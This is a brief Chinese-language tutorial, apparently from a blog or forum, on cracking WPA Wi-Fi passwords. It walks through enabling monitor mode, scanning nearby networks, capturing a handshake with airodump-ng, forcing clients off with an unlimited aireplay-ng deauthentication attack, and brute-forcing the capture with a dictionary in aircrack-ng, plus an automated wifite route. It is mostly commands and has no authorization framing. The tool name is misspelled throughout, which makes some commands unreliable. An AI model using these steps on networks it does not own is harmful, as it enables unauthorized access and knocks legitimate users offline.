第一种方法:主要通过抓取流量传输的数据包,然后用字典对已加密的数据包进行破解
airmion-ng 查看网卡是否连接 如果连接好会有一个wlan0
airmion-ng start wlan0 打开网卡监视
Ifconfig 查看是否打开网卡监视 如果打开的话会显示wlan0mon
airodump-ng wlan0mon 使用已打开监视的网卡进行周围WiFi扫描
搜到之后按CTRL+C 停止搜索
Airodump-ng -c [信道C/H] --bssid [bssid数值] wlan0mon -w [数据包的名字]
如果长时间抓不到,就攻击一个连接,新打开一个终端输入
aireplay-ng -0 0[攻击次数,0是无限次数] -c [客户端bssid] -a [路由器bssid] wlan0mon
当上方出现WAP handshake:(bssid)时代表抓包成功,两个终端按CTRL+C终止攻击,不让客户端会一直断网
Cd /[刚才抓到包存在的目录]
ls 列出来目录所有内容
Aircrack-ng -w[字典的路径] [刚才抓到的包,后缀为.cap的文件]
等待~~~等待~~~
KEY FOUND![密码]
第二种方法:
同第一种方法一样,不过操作方法不一样。
打开终端
airmion-ng 查看网卡是否连接 如果连接好会有一个wlan0
airmion-ng start wlan0 打开网卡监视
Ifconfig 查看是否打开网卡监视 如果打开的话会显示wlan0mon
wifite 搜索wifi
Ctrl+c 取消搜索
输入频道[C/H] 回车,让工具自己跑包
等待~~~等待~~~
PSK(password):密码
这种东西纯靠运气,运气好几分钟,运气不好,几天都破不开!!!